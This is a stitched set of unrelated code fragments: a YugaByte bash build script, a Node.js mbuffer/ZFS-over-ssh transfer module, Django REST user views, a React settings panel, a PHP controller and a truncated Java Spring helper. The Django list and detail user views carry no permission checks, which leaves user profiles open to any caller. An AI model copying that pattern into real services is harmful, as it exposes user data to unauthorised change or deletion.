  # Canonicalize to an absolute physical path when the directory already exists.
  if [[ -d $predefined_build_root ]]; then
    predefined_build_root=$( cd "$predefined_build_root" && pwd )
  fi
  if [[ $predefined_build_root != $YB_BUILD_INTERNAL_PARENT_DIR/* && \
        $predefined_build_root != $YB_BUILD_EXTERNAL_PARENT_DIR/* ]]; then
    # Sometimes $predefined_build_root contains symlinks on its path.
    $YB_SRC_ROOT/build-support/validate_build_root.py \
      "$predefined_build_root" \
      "$YB_BUILD_INTERNAL_PARENT_DIR" \
      "$YB_BUILD_EXTERNAL_PARENT_DIR"
  fi
  local basename=${predefined_build_root##*/}
  if [[ $basename =~ $BUILD_ROOT_BASENAME_RE ]]; then
    local _build_type=${BASH_REMATCH[1]}
    local _compiler_type=${BASH_REMATCH[2]}
    local _linking_type=${BASH_REMATCH[3]}
    local _edition=${BASH_REMATCH[4]}
    local _dash_ninja=${BASH_REMATCH[5]}
  else
    fatal "Could not parse build root directory name '$basename'" \
          "(full path: '$predefined_build_root'). Expected to match '$BUILD_ROOT_BASENAME_RE'."
  fi
  if [[ -z ${build_type:-} ]]; then
    if ! "$handle_predefined_build_root_quietly"; then
      # Bug fix: this previously logged "$build_type", which is still empty at this
      # point; log the value we are about to assign instead.
      log "Setting build type to '$_build_type' based on predefined build root ('$basename')"
    fi
    build_type=$_build_type
    validate_build_type "$build_type"
  elif [[ $build_type != $_build_type ]]; then
    fatal "Build type from the build root ('$_build_type' from '$predefined_build_root') does " \
          "not match current build type ('$build_type')."
  fi
  if [[ -z ${YB_COMPILER_TYPE:-} ]]; then
    export YB_COMPILER_TYPE=$_compiler_type
    if ! "$handle_predefined_build_root_quietly"; then
      log "Automatically setting compiler type to '$YB_COMPILER_TYPE' based on predefined build" \
          "root ('$basename')"
    fi
  elif [[ $YB_COMPILER_TYPE != $_compiler_type ]]; then
    fatal "Compiler type from the build root ('$_compiler_type' from '$predefined_build_root') " \
          "does not match YB_COMPILER_TYPE ('$YB_COMPILER_TYPE')."
  fi
  # Ensure YB_USE_NINJA is exported even when empty, so child processes see a
  # consistent value.
  export YB_USE_NINJA=${YB_USE_NINJA:-}
  if [[ $_dash_ninja == "-ninja" && -z ${YB_USE_NINJA:-} ]]; then
    if ! "$handle_predefined_build_root_quietly"; then
      log "Setting YB_USE_NINJA to 1 based on predefined build root ('$basename')"
    fi
    export YB_USE_NINJA=1
  elif [[ $_dash_ninja == "-ninja" && $YB_USE_NINJA != "1" || \
          $_dash_ninja != "-ninja" && $YB_USE_NINJA == "1" ]]; then
    fatal "The use of ninja from build root ('$predefined_build_root') does not match that" \
          "of the YB_USE_NINJA env var ('$YB_USE_NINJA')"
  fi
  if [[ -z ${YB_EDITION:-} ]]; then
    export YB_EDITION=$_edition
    if ! "$handle_predefined_build_root_quietly"; then
      log "Detected YB_EDITION: '$YB_EDITION' based on predefined build root ('$basename')"
    fi
  elif [[ $YB_EDITION != $_edition ]]; then
    fatal "Edition from the build root ('$_edition' from '$predefined_build_root') " \
          "does not match YB_EDITION ('$YB_EDITION')."
  fi
}
# Remove the build/latest symlink to prevent Jenkins from showing every test twice in test results.
# We call this from a few different places just in case.
remove_latest_symlink() {
  # See the comment above: delete the build/latest symlink if present ("-h" tests
  # specifically for a symlink). "set -x" in a subshell echoes the unlink command
  # without leaving tracing enabled.
  local latest_build_link=$YB_BUILD_PARENT_DIR/latest
  if [[ -h $latest_build_link ]]; then
    log "Removing the latest symlink at '$latest_build_link'"
    ( set -x; unlink "$latest_build_link" )
  fi
}
# Set the short_os_name global to "mac", "linux", or "unknown_os".
detect_os() {
  if is_mac; then
    short_os_name="mac"
  elif is_linux; then
    short_os_name="linux"
  else
    short_os_name="unknown_os"
  fi
}
# Assigns a random "test invocation id" that allows to kill stuck processes corresponding to this
# instance of a particular test or the whole test suite.
set_test_invocation_id() {
  # See the comment above: export a unique id (timestamp + two $RANDOM values + PID)
  # that test processes embed in their command lines so kill_stuck_processes can
  # find them later.
  local timestamp=$( get_timestamp_for_filenames )
  export YB_TEST_INVOCATION_ID=test_invocation_${timestamp}_${RANDOM}_${RANDOM}_$$
}
# Kills any processes that have YB_TEST_INVOCATION_ID in their command line. Sets
# killed_stuck_processes=true in case that happens.
kill_stuck_processes() {
  # See the comment above: SIGKILL every process whose command line contains our
  # YB_TEST_INVOCATION_ID; no-op when the id is unset.
  expect_num_args 0 "$@"
  killed_stuck_processes=false
  if [[ -z ${YB_TEST_INVOCATION_ID:-} ]]; then
    return
  fi
  local pid
  # pgrep -f matches against the full command line, not just the process name.
  for pid in $( pgrep -f "$YB_TEST_INVOCATION_ID" ); do
    log "Found pid $pid from this test suite (YB_TEST_INVOCATION_ID=$YB_TEST_INVOCATION_ID)," \
        "killing it with SIGKILL."
    # Log the process details before killing it, for post-mortem debugging.
    ps -p "$pid" -f
    if kill -9 "$pid"; then
      killed_stuck_processes=true
      log "Killed process $pid with SIGKILL."
    fi
  done
}
# Walk up from the current working directory until a path component matches
# BUILD_ROOT_BASENAME_RE, then treat that directory as the predefined build root
# (quietly). Fatal if no ancestor qualifies. Skipped entirely for third-party builds.
handle_build_root_from_current_dir() {
  if [[ ${YB_IS_THIRDPARTY_BUILD:-} == "1" ]]; then
    return
  fi
  # "local" shadows the global flag so the quiet mode only applies to this call.
  local handle_predefined_build_root_quietly=true
  local d=$PWD
  while [[ $d != "/" && $d != "" ]]; do
    basename=${d##*/}
    if [[ $basename =~ $BUILD_ROOT_BASENAME_RE ]]; then
      predefined_build_root=$d
      handle_predefined_build_root
      return
    fi
    # Strip the last path component and continue upward.
    d=${d%/*}
  done
  fatal "Working directory of the compiler '$PWD' is not within a valid YugaByte build root."
}
# Validate that a numeric command-line argument is an integer within [min, max];
# calls fatal with a descriptive message otherwise.
validate_numeric_arg_range() {
  expect_num_args 4 "$@"
  local arg_name=$1
  local arg_value=$2
  local -r -i min_value=$3
  local -r -i max_value=$4
  if [[ ! $arg_value =~ ^[0-9]+$ ]]; then
    fatal "Invalid numeric argument value for --$arg_name: '$arg_value'"
  fi
  # Arithmetic context: equivalent to [[ ... -lt/-gt ... ]] for validated integers.
  if (( arg_value < min_value || arg_value > max_value )); then
    fatal "Value out of range for --$arg_name: $arg_value, must be between $min_value and" \
          "$max_value."
  fi
}
# -------------------------------------------------------------------------------------------------
# Python support
# -------------------------------------------------------------------------------------------------
# Checks syntax of all Python scripts in the repository.
# Checks syntax of all Python scripts in the repository (see comment above), running
# the checker on up to 8 files in parallel.
check_python_script_syntax() {
  if [[ -n ${YB_VERBOSE:-} ]]; then
    log "Checking syntax of Python scripts"
  fi
  pushd "$YB_SRC_ROOT"
  # Split xargs input on newlines only, so file names with spaces survive.
  local IFS=$'\n'
  git ls-files '*.py' | xargs -P 8 -n 1 "$YB_BUILD_SUPPORT_DIR/check_python_syntax.py"
  popd
}
add_python_wrappers_dir_to_path() {
  # Make sure the Python wrappers directory is the first on PATH.
  # Remove any existing occurrence first so repeated calls do not stack duplicates.
  remove_path_entry "$YB_PYTHON_WRAPPERS_DIR"
  export PATH=$YB_PYTHON_WRAPPERS_DIR:$PATH
}
# Create (if needed) and activate the project's Python 2 virtualenv under
# YB_BUILD_PARENT_DIR, then install requirements.txt into it.
# YB_RECREATE_VIRTUALENV=1 forces a rebuild; YB_PIP_NO_CACHE disables the pip cache.
activate_virtualenv() {
  local virtualenv_parent_dir=$YB_BUILD_PARENT_DIR
  local virtualenv_dir=$virtualenv_parent_dir/$YB_VIRTUALENV_BASENAME
  # Paranoid check before any "rm -rf" below: never delete a directory that does not
  # end with the expected basename.
  if [[ ! $virtualenv_dir = */$YB_VIRTUALENV_BASENAME ]]; then
    fatal "Internal error: virtualenv_dir ('$virtualenv_dir') must end" \
          "with YB_VIRTUALENV_BASENAME ('$YB_VIRTUALENV_BASENAME')"
  fi
  if [[ ${YB_RECREATE_VIRTUALENV:-} == "1" && -d $virtualenv_dir ]]; then
    log "YB_RECREATE_VIRTUALENV is set, deleting virtualenv at '$virtualenv_dir'"
    rm -rf "$virtualenv_dir"
    unset YB_RECREATE_VIRTUALENV
  fi
  if [[ ! -d $virtualenv_dir ]]; then
    if [[ -n ${VIRTUAL_ENV:-} && -f $VIRTUAL_ENV/bin/activate ]]; then
      local old_virtual_env=$VIRTUAL_ENV
      # Re-activate and deactivate the other virtualenv we're in. Otherwise the deactivate
      # function might not even be present in our current shell. This is necessary because otherwise
      # the --user installation below will fail.
      # (set +eu: activate scripts are not written for "set -eu" shells.)
      set +eu
      . "$VIRTUAL_ENV/bin/activate"
      deactivate
      set -eu
      # Not clear why deactivate does not do this.
      remove_path_entry "$old_virtual_env/bin"
    fi
    # We need to be using system python to install the virtualenv module or create a new virtualenv.
    pip2 install virtualenv --user
    (
      set -x
      mkdir -p "$virtualenv_parent_dir"
      cd "$virtualenv_parent_dir"
      python2 -m virtualenv "$YB_VIRTUALENV_BASENAME"
    )
  fi
  # The activate script references unset variables; relax "set -u" around it.
  set +u
  . "$virtualenv_dir"/bin/activate
  set -u
  local pip_no_cache=""
  if [[ -n ${YB_PIP_NO_CACHE:-} ]]; then
    pip_no_cache="--no-cache-dir"
  fi
  pip2 install -r "$YB_SRC_ROOT/requirements.txt" $pip_no_cache
  # Re-assert wrapper precedence: activation just prepended the virtualenv's bin dir.
  add_python_wrappers_dir_to_path
}
# Verify that the given Python interpreter has the expected major version and at
# least the given minor version; fatal otherwise.
check_python_interpreter_version() {
  expect_num_args 3 "$@"
  local python_interpreter=$1
  local expected_major_version=$2
  local minor_version_lower_bound=$3
  # Get the Python interpreter version. Filter out debug output we may be adding if
  # YB_PYTHON_WRAPPER_DEBUG is set.
  # (Python 2 prints its version to stderr, hence "2>&1 >/dev/null".)
  local version_str=$( "$python_interpreter" --version 2>&1 >/dev/null | grep -v "Invoking Python" )
  # Parse "Python X.Y.Z": strip the prefix, then split out major and minor.
  version_str=${version_str#Python }
  local actual_major_version=${version_str%%.*}
  local version_str_without_major=${version_str#*.}
  local actual_minor_version=${version_str_without_major%%.*}
  if [[ $actual_major_version -ne $expected_major_version ]]; then
    fatal "Expected major version for Python interpreter '$python_interpreter' to be" \
          "'$expected_major_version', found '$actual_major_version'. Full Python version:" \
          "'$version_str'."
  fi
  if [[ $actual_minor_version -lt $minor_version_lower_bound ]]; then
    fatal "Expected minor version for Python interpreter '$python_interpreter' to be at least " \
          "'$minor_version_lower_bound', found '$actual_minor_version'. Full Python version:" \
          "'$version_str'."
  fi
}
# Require a Python 2.7+ "python2" interpreter and, on macOS, sanity-check the
# Homebrew-managed interpreter entries in /usr/local/bin (each must be a symlink and
# must not point into /usr/bin, which would indicate a broken Homebrew setup).
check_python_interpreter_versions() {
  check_python_interpreter_version python2 2 7
  if is_mac; then
    local python_interpreter_basename
    # Bug fix: the list previously contained "python 2.7" (with a space), which
    # checked the nonsensical path /usr/local/bin/2.7 and tested "python" twice;
    # "python2.7" is the intended basename.
    for python_interpreter_basename in python python2 python2.7 python3; do
      local homebrew_interpreter_path=/usr/local/bin/$python_interpreter_basename
      if [[ -e $homebrew_interpreter_path ]]; then
        if [[ ! -L $homebrew_interpreter_path ]]; then
          fatal "$homebrew_interpreter_path exists but is not a symlink." \
                "Broken Homebrew installation?"
        fi
        local link_target=$( readlink "$homebrew_interpreter_path" )
        if [[ $link_target == /usr/bin/* ]]; then
          fatal "Found symlink $homebrew_interpreter_path -> $link_target." \
                "Broken Homebrew installation?"
        fi
      fi
    done
  fi
}
# Log a human-readable description of what exists at the given path (symlink to a
# file/directory, broken symlink, plain file, directory, or nothing). Checks are
# ordered so that symlink cases are reported before the plain file/dir cases.
log_file_existence() {
  expect_num_args 1 "$@"
  local file_name=$1
  if [[ -L $file_name && -f $file_name ]]; then
    log "Symlink exists and points to a file: $file_name"
  elif [[ -L $file_name && -d $file_name ]]; then
    log "Symlink exists and points to a directory: $file_name"
  elif [[ -L $file_name ]]; then
    log "Symlink exists but it might be broken: $file_name"
  elif [[ -f $file_name ]]; then
    log "File exists: $file_name"
  elif [[ -d $file_name ]]; then
    log "Directory exists: $file_name"
  elif [[ ! -e $file_name ]]; then
    log "File does not exist: $file_name"
  else
    # Exists (-e) but is none of the above: e.g. a device, socket, or FIFO.
    log "File exists but we could not determine its type: $file_name"
  fi
}
# Returns current git SHA1 in the variable current_git_sha1.
get_current_git_sha1() {
  # Returns current git SHA1 in the variable current_git_sha1 (see comment above).
  current_git_sha1=$( git rev-parse HEAD )
  # Guard against git errors or unexpected output: must be exactly 40 hex digits.
  if [[ ! $current_git_sha1 =~ ^[0-9a-f]{40}$ ]]; then
    fatal "Could not get current git SHA1 in $PWD, got: $current_git_sha1"
  fi
}
# -------------------------------------------------------------------------------------------------
# Initialization
# -------------------------------------------------------------------------------------------------
detect_os
# This script is expected to be in build-support, a subdirectory of the repository root directory.
set_yb_src_root "$( cd "$( dirname "$BASH_SOURCE" )"/.. && pwd )"
# A trailing slash would break the string concatenations below (e.g. "__build").
if [[ $YB_SRC_ROOT == */ ]]; then
  fatal "YB_SRC_ROOT ends with '/' (not allowed): '$YB_SRC_ROOT'"
fi
# Parent directory for build directories of all build types.
YB_BUILD_INTERNAL_PARENT_DIR=$YB_SRC_ROOT/build
# The "external" build parent lives NEXT TO the source tree: "<src>__build".
YB_BUILD_EXTERNAL_PARENT_DIR=${YB_SRC_ROOT}__build
if [[ ${YB_USE_EXTERNAL_BUILD_ROOT:-} == "1" ]]; then
  YB_BUILD_PARENT_DIR=$YB_BUILD_EXTERNAL_PARENT_DIR
else
  YB_BUILD_PARENT_DIR=$YB_BUILD_INTERNAL_PARENT_DIR
fi
if [[ ! -d $YB_BUILD_SUPPORT_DIR ]]; then
  fatal "Could not determine YB source directory from '$BASH_SOURCE':" \
        "$YB_BUILD_SUPPORT_DIR does not exist."
fi
# Fall back to the in-tree third-party directory when none was specified.
using_default_thirdparty_dir=false
if [[ -z ${YB_THIRDPARTY_DIR:-} ]]; then
  YB_THIRDPARTY_DIR=$YB_SRC_ROOT/thirdparty
  using_default_thirdparty_dir=true
fi
# Default CMake options: route all compilation through our compiler wrappers.
readonly YB_DEFAULT_CMAKE_OPTS=(
  "-DCMAKE_C_COMPILER=$YB_COMPILER_WRAPPER_CC"
  "-DCMAKE_CXX_COMPILER=$YB_COMPILER_WRAPPER_CXX"
)
YB_PYTHON_WRAPPERS_DIR=$YB_BUILD_SUPPORT_DIR/python-wrappers
# The Python wrapper scripts source this file too; skip the steps that would recurse
# or reorder PATH when running inside one of them.
if ! "${yb_is_python_wrapper_script:-false}"; then
  detect_linuxbrew
  add_python_wrappers_dir_to_path
fi
# End of initialization.
# -------------------------------------------------------------------------------------------------
|
var uuid = require('uuid');
var windowSize = 128;
var exec = require('child_process').exec;
var spawn = require('child_process').spawn;
var config = require('../config');
// Orchestrates an mbuffer-based ZFS transfer between a local and a remote host.
// NOTE(review): the `options` parameter is unused here — presumably callers assign
// `transfer` and `log` after construction; confirm against call sites.
function Mbuffer(options){
  // Child process handles for the two ends (set back to null once each closes).
  this.remoteEnd = null;
  this.localEnd = null;
  // Transfer object supplying zfs send/receive commands and endpoint info.
  this.transfer = null;
  // True while tearing the transfer down after a failure.
  this.aborting = false;
  // First error encountered, reported via the completion callback.
  this.err = null;
  // Exit codes from each child process's 'close' event.
  this.localCloseCode = null;
  this.remoteCloseCode = null;
  // Guards against invoking the completion callback more than once.
  this.callbackDone = false;
  this.log = null;
}
// Resolve the mbuffer binary for the given side ('local' or anything else meaning
// remote); falls back to "mbuffer" on PATH when no path is configured.
Mbuffer.prototype.executablePath = function(localOrRemote){
  var configured = (localOrRemote == 'local')
    ? config.mBufferLocalPath
    : config.mBufferRemotePath;
  return configured != null ? configured : 'mbuffer';
}
// Resolve the mbuffer memory-buffer size (the -m flag value) for the given side;
// defaults to '1G' when not configured.
Mbuffer.prototype.bufferSize = function(localOrRemote){
  var configured = (localOrRemote == 'local')
    ? config.mBufferLocalBufferSize
    : config.mBufferRemoteBufferSize;
  return configured != null ? configured : '1G';
}
// Build the mbuffer command line for the RECEIVING side: "-v 4" is verbose enough to
// print "listening on" (used as a readiness signal in execute), "-W 60" is a
// 60-second watchdog, "-I <port>" listens for an inbound TCP connection.
Mbuffer.prototype.mBufferReceiveCmd = function(portNumber){
  var localOrRemote = null;
  // The receiver runs on whichever side the data flows TO.
  if ( this.transfer.localToRemote() ){
    localOrRemote = 'remote';
  }else{
    localOrRemote = 'local';
  }
  return this.executablePath(localOrRemote) + " -v 4 -W 60 -s 128k -m " + this.bufferSize(localOrRemote) + " -I " + portNumber.toString();
}
// Build the mbuffer command line for the SENDING side: "-O host:port" connects out
// to the listening receiver; "-W 60" is a 60-second watchdog.
Mbuffer.prototype.mBufferSendCmd = function(portNumber){
  var localOrRemote = null;
  // The sender runs on whichever side the data flows FROM.
  if ( this.transfer.localToRemote() ){
    localOrRemote = 'local';
  }else{
    localOrRemote = 'remote';
  }
  return this.executablePath(localOrRemote) + " -s 128k -m " + this.bufferSize(localOrRemote) + " -W 60 -O " + this.transfer.remoteEndpoint().hostname + ":" + portNumber.toString();
}
// Start the remote end over SSH: mbuffer listening on portNumber piped into the
// transfer's "zfs receive" command. Returns the spawned ssh child process.
Mbuffer.prototype.initiateRemote = function(transfer, portNumber){
  var cmd = null;
  if ( transfer.localToRemote() ){
    cmd = [
      this.mBufferReceiveCmd(portNumber),
      "|",
      transfer.zfsReceiveCmd()
    ].join(' ');
  }
  // NOTE(review): when localToRemote() is false, cmd stays null and the string
  // "null" becomes the remote command — presumably remote-to-local transfers are
  // not supported here yet; confirm with callers.
  var sshCmd = transfer.remoteEndpoint().sshCmd();
  // Drop the first element (presumably the "ssh" token itself) since we pass the
  // remaining arguments to spawn('ssh', ...) — TODO confirm sshCmd()'s shape.
  sshCmd.splice(0, 1);
  sshCmd.push(cmd);
  this.log.trace('Initiating remote end with ssh ' + sshCmd.join(' '));
  var setupRemote = spawn('ssh', sshCmd);
  return setupRemote;
}
// Start the local end: "zfs send" piped into mbuffer connecting out to the remote
// receiver. Returns the spawned /bin/sh child process.
Mbuffer.prototype.initiateLocal = function(transfer, portNumber){
  var cmd = null;
  // NOTE(review): destinationHost is computed but never used — dead local.
  var destinationHost = transfer.remoteEndpoint().hostname;
  if ( transfer.localToRemote() ){
    //will be getting called second and the remote side is already setup
    //just need to run zfs send piped into mbuffer linked to the remote side
    cmd = [
      transfer.zfsSendCmd(),
      "|",
      this.mBufferSendCmd(portNumber)
    ].join(' ');
  }
  // NOTE(review): as in initiateRemote, cmd stays null for remote-to-local
  // transfers and "/bin/sh -c null" would be spawned — confirm intended scope.
  this.log.trace('Initiating local end with ' + cmd);
  var setupLocal = spawn('/bin/sh', ['-c', cmd]);
  return setupLocal;
}
// Scan `ps` output for mbuffer processes involved with the given port and return
// their PIDs. Matches either the sending side ("host:port" in the command line) or
// the listening side ("-I port").
Mbuffer.prototype.findMatchingPids = function(processList, portNumber){
  var port = portNumber.toString();
  var sendMarker = this.transfer.remoteEndpoint().hostname + ':' + port;
  var recvMarker = '-I ' + port;
  var pids = [];
  processList.split('\n').forEach(function(line){
    if (( line.indexOf(sendMarker) == -1 ) && ( line.indexOf(recvMarker) == -1 )){
      return;
    }
    // Collapse runs of spaces: in "ps auwwwx" output the PID is the second
    // whitespace-separated column.
    var columns = line.split(' ').filter(function(column){
      return column.length != 0;
    });
    pids.push(columns[1]);
  });
  return pids;
}
// Find and kill leftover mbuffer processes for the given port, either locally or on
// the remote host (over ssh). Needed because killing the ssh / /bin/sh parent does
// not terminate mbuffer itself (see the block comment before execute). Always calls
// callback(null); kill failures are ignored.
Mbuffer.prototype.cleanupMbuffer = function(portNumber, remote, callback){
  var cb = callback;
  var self = this;
  var pn = portNumber;
  var grep = 'ps auwwwx | grep mbuffer';
  var ssh = self.transfer.remoteEndpoint().sshCmd().join(' ');
  var cmd = null;
  if ( remote === true ){
    // Run the process listing on the remote host.
    cmd = ssh + ' ' + grep;
  }else{
    cmd = grep;
  }
  var getPid = exec(cmd, function(error, stdout, stderr){
    var pids = self.findMatchingPids(stdout, pn);
    if ( pids.length == 0 ){
      // Nothing to clean up.
      cb(null);
      return;
    }
    var killCmd = null;
    if ( remote === true ){
      killCmd = ssh + ' kill ' + pids.join(' ');
    }else{
      killCmd = 'kill ' + pids.join(' ');
    }
    var killPid = exec(killCmd, function(error, stdout, stderr){
      cb(null);
    });
  });
}
// Invoke `callback` exactly once, after BOTH child processes have closed.
// Success (null) when both exit codes are 0; otherwise the recorded error, or a
// generic error carrying both close codes.
Mbuffer.prototype.callbackIfDone = function(callback){
  if ( this.callbackDone ){
    return;
  }
  if (( this.localEnd != null ) || ( this.remoteEnd != null )){
    // At least one end is still running; wait for its 'close' event.
    return false;
  }
  this.callbackDone = true;
  if (( this.localCloseCode == 0 ) && ( this.remoteCloseCode == 0 )){
    // Everything went well.
    callback(null);
  }else if ( this.err ){
    // We hit an error somewhere, pass it back.
    callback(this.err);
  }else{
    // We're in some odd state: non-zero exit but no recorded error. Bug fix: the
    // close codes were previously passed as extra Error() arguments, which the
    // Error constructor silently ignores — embed them in the message instead.
    callback(new Error('Unknown error condition - refer to logs. Local close code: ' +
      this.localCloseCode + ' Remote close code: ' + this.remoteCloseCode));
  }
  return false;
}
// Parse a verbose mbuffer status line (comma-separated "in @ ...", "out @ ...",
// "buffer ...", and total segments) into a {in, out, buffer, total} object.
// Returns null for null input or for lines that are not status lines.
Mbuffer.prototype.extractStatus = function(statusText){
  if ( statusText == null ){
    return null;
  }
  // A status line must mention both the input and output rate markers.
  if (( statusText.indexOf('in @') == -1 ) || ( statusText.indexOf('out @') == -1 )){
    return null;
  }
  var status = {};
  statusText.split(',').forEach(function(rawSegment){
    // Tokenize on spaces, dropping empty strings from repeated separators.
    var tokens = rawSegment.trim().split(' ').filter(function(token){
      return token.length > 0;
    });
    if ( tokens[0] == 'in' ){
      status.in = [tokens[2], tokens[3]].join(' ');
    }else if ( tokens[0] == 'out' ){
      status.out = [tokens[2], tokens[3]].join(' ');
    }else if ( tokens[0] == 'buffer' ){
      status.buffer = [tokens[1]].join(' ');
    }else{
      // Any unrecognized segment is treated as the running total.
      status.total = [tokens[0], tokens[1]].join(' ');
    }
  });
  return status;
}
/*
execute will first use SSH to start the mbuffer/zfs on the remote side
it uses the verbose setting of 4 to get an indication of when mbuffer is
ready and if it encounters an issue listening
if the remote side is okay, it starts the local side
because we're using mbuffer in direct/network mode, it will tend to continue
executing rather than dying and watchdog timers don't work
so if either side exits for some reason, the other side is examined for rogue
mbuffer processes that are terminated via 'kill'. sending a signal to the
ssh or /bin/sh process is not enough to kill it. explicitly terminating
the mbuffer process allows the ssh or /bin/sh process to exit with an error
code
*/
//Run the transfer. The remote mbuffer/zfs side is started first; once its
//stderr reports it is listening, the local side is started. Either side
//closing with an error triggers explicit cleanup of the peer's mbuffer
//process (see the block comment above this function for the rationale).
//callback is invoked exactly once by callbackIfDone when both sides close.
Mbuffer.prototype.execute = function(callback){
    this.log.info('Executing transfer');
    var self = this;
    var cb = callback;
    //generate a port number for mbuffer
    var portNumber = Math.floor(Math.random() * (60000 - 1025) + 1025);
    self.remoteEnd = self.initiateRemote(self.transfer, portNumber);
    self.remoteEnd.stderr.on('data', function (data) {
        var str = data.toString();
        var statusObj = self.extractStatus(str);
        if ( statusObj != null ){
            //FIX: was `this.remoteStatus` — inside an event listener `this`
            //is the stderr stream, not the Mbuffer instance, so the status
            //was being written to (and logged from) the wrong object.
            self.remoteStatus = statusObj;
            self.log.info('Remote total currently ' + self.remoteStatus.total);
        }
        if ( data.toString().indexOf('Address already in use') != -1){
            //the randomly chosen port is taken - abort the whole transfer
            self.aborting = true;
            self.err = new Error('Random port selection failed - picked one that was in use');
            self.remoteEnd.kill('SIGINT');
            return;
        }
        if ( data.toString().indexOf('listening on') != -1 ){
            //start local
            self.localEnd = self.initiateLocal(self.transfer, portNumber);
            self.localEnd.stderr.on('data', function (data) {
                var str = data.toString();
                var statusObj = self.extractStatus(str);
                if ( statusObj != null ){
                    //FIX: same `this` -> `self` correction as the remote side
                    self.localStatus = statusObj;
                    self.log.info('Local total currently ' + self.localStatus.total);
                }
            });
            self.localEnd.on('close', function (code) {
                self.localCloseCode = code;
                self.log.trace('Local child process exited with code ' + code);
                self.localEnd = null;
                if (( code != null ) && ( code > 0 )){
                    //the local side has errored - clean up remote if its still around
                    self.aborting = true;
                    //mbuffer on the remote side will hang around if we just kill SSH
                    self.cleanupMbuffer(portNumber, true, function(err){
                        //remote side will die on its own
                    });
                }
                self.callbackIfDone(cb);
            });
            self.localEnd.on('error', function(err){
                //spawn failures are surfaced via the 'close' handler above
            });
        }
        if ( data.toString().indexOf('cannot receive') != -1){
            //abort
            self.err = new Error(data.toString());
            self.aborting = true;
            self.remoteEnd.kill('SIGINT');
            if ( self.localEnd != null ){
                //instead of killing the child process that was created
                //we need to go after the mBuffer process directly. killing the child
                //process causes mBuffer to hang around and madly consume CPU. Even
                //the watchdog timer can't kill it
                self.cleanupMbuffer(portNumber, false, function(err){
                    //should all come crashing down at this point
                });
            }
            return;
        }
    });
    self.remoteEnd.on('close', function (code) {
        self.remoteCloseCode = code;
        self.remoteEnd = null;
        self.log.trace('Remote child process exited with code ' + code);
        self.callbackIfDone(cb);
    });
}
module.exports = Mbuffer;
|
from rest_framework import viewsets
from userFit.serializers import UserSerializer
from userFit.models import UserProfile
from userFit.permissions import IsOwner
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import generics
from activity.authentification import QuietBasicAuthentication
class AuthView(APIView):
    """Authenticate via HTTP Basic and echo back the authenticated user."""
    authentication_classes = (QuietBasicAuthentication,)
    serializer_class = UserSerializer
    def post(self, request, *args, **kwargs):
        # request.user was populated by QuietBasicAuthentication; serialize it.
        return Response(self.serializer_class(request.user).data)
class UserViewSet(viewsets.ModelViewSet):
    """Full CRUD over user profiles, restricted to the owning user."""
    permission_classes = (IsOwner,)
    # Most recently joined users first.
    queryset = UserProfile.objects.all().order_by('-date_joined')
    serializer_class = UserSerializer
class UserList(generics.ListCreateAPIView):
    """List all user profiles (GET) or create a new one (POST)."""
    queryset = UserProfile.objects.all()
    serializer_class = UserSerializer
class UserDetail(generics.RetrieveUpdateDestroyAPIView):
    """Retrieve (GET), update (PUT/PATCH), or delete (DELETE) one user profile."""
    queryset = UserProfile.objects.all()
    serializer_class = UserSerializer
|
<filename>src/app/components/Settings/SettingsCritical.tsx<gh_stars>0
import React, {useState} from 'react';
import Typography from '@material-ui/core/Typography';
import Select from '@material-ui/core/Select';
import MenuItem from '@material-ui/core/MenuItem';
import InputLabel from '@material-ui/core/InputLabel';
import FormControl from '@material-ui/core/FormControl';
import SettingsCriticalExec from './SettingsCriticalExec';
import { showUserSaveFilesInFileManager } from '../../functions/files';
import {reset} from '../../functions/reset';
// Props for the SettingsCritical danger-zone panel.
interface SettingsCriticalProps {
    // Invoked when the panel should close. NOTE(review): the loose `Function`
    // type accepts any callable — presumably a no-arg callback; confirm callers
    // before tightening to `() => void`.
    onClose: Function,
}
// Danger-zone settings panel: the user selects an irreversible action
// (open private save files, or reset everything) and must confirm it by
// retyping a verification phrase inside SettingsCriticalExec.
export default function SettingsCritical(props: SettingsCriticalProps) {
    // Currently selected action; "user" (just opens the file manager) is the
    // least destructive option, so it is the default.
    const [action, setAction] = useState("user");
    // Material-UI v4 Select exposes the selection as `unknown` on the change
    // event; type it properly instead of `any` and keep the "user" fallback.
    const handleActionChange = (e: React.ChangeEvent<{ value: unknown }>) => {
        setAction((e.target.value as string) ?? "user");
    }
    // Phrase the user must retype to confirm the currently selected action.
    const getVerificationText = () => {
        switch (action) {
            case "user":
                return "access-private-program-files"
            case "reset":
                return "reset-everything"
            default:
                return "invalid-action"
        }
    }
    // Execute the confirmed action.
    const onActionExec = () => {
        switch (action) {
            case "user":
                showUserSaveFilesInFileManager();
                break;
            case "reset":
                reset();
                break;
            default:
                break;
        }
    }
    return (
        <div
            className="flex-col-center"
            style={{
                gap: "10px"
            }}
        >
            <Typography>
                Danger Zone
            </Typography>
            <p
                style={{
                    padding: "0px",
                    margin: "0px"
                }}
            >
                Be Careful: Irreversible Actions
            </p>
            <FormControl
                style={{
                    minWidth: "200px"
                }}
            >
                <InputLabel>Action</InputLabel>
                <Select
                    value={action}
                    onChange={handleActionChange}
                >
                    <MenuItem value={"user"}>Access User Files</MenuItem>
                    <MenuItem value={"reset"}>Reset</MenuItem>
                </Select>
            </FormControl>
            <SettingsCriticalExec
                verifyUserText={getVerificationText()}
                onActionExec={onActionExec}
                onClose={props.onClose}
            />
        </div>
    )
}
public function getProducts($id = NULL){
    // Look up every product belonging to the requested category.
    $categoryModel = new CategoryModel();
    $matches = $categoryModel->findProductsByCategory($id);
    if (!$matches) {
        // Nothing matched: report a 404 with a JSON error payload.
        return $this->response->setStatusCode(404)->setJSON(['error' => 'No products found for the given category ID']);
    }
    // Found products: return them as JSON.
    return $this->response->setJSON($matches);
}
<filename>src/main/java/com/home/demo/util/UserInfo.java
package com.home.demo.util;
import java.util.Collection;
import org.springframework.security.core.GrantedAuthority;
import org.springframework.security.core.context.SecurityContextHolder;
import org.springframework.security.core.userdetails.UserDetails;
/**
 * Static helpers for reading the current Spring Security principal.
 */
public class UserInfo {
	/**
	 * Get the username of the currently authenticated principal.
	 *
	 * @return the username, the principal's toString() when it is not a
	 *         UserDetails, or null when no authentication is present
	 *         (previously this threw a NullPointerException).
	 */
	public static String getPrincipal(){
		String userName = null;
		// Guard: an unauthenticated context yields a null Authentication.
		if (SecurityContextHolder.getContext().getAuthentication() == null) {
			return null;
		}
		Object principal = SecurityContextHolder.getContext().getAuthentication().getPrincipal();
		if (principal instanceof UserDetails) {
			userName = ((UserDetails)principal).getUsername();
		} else {
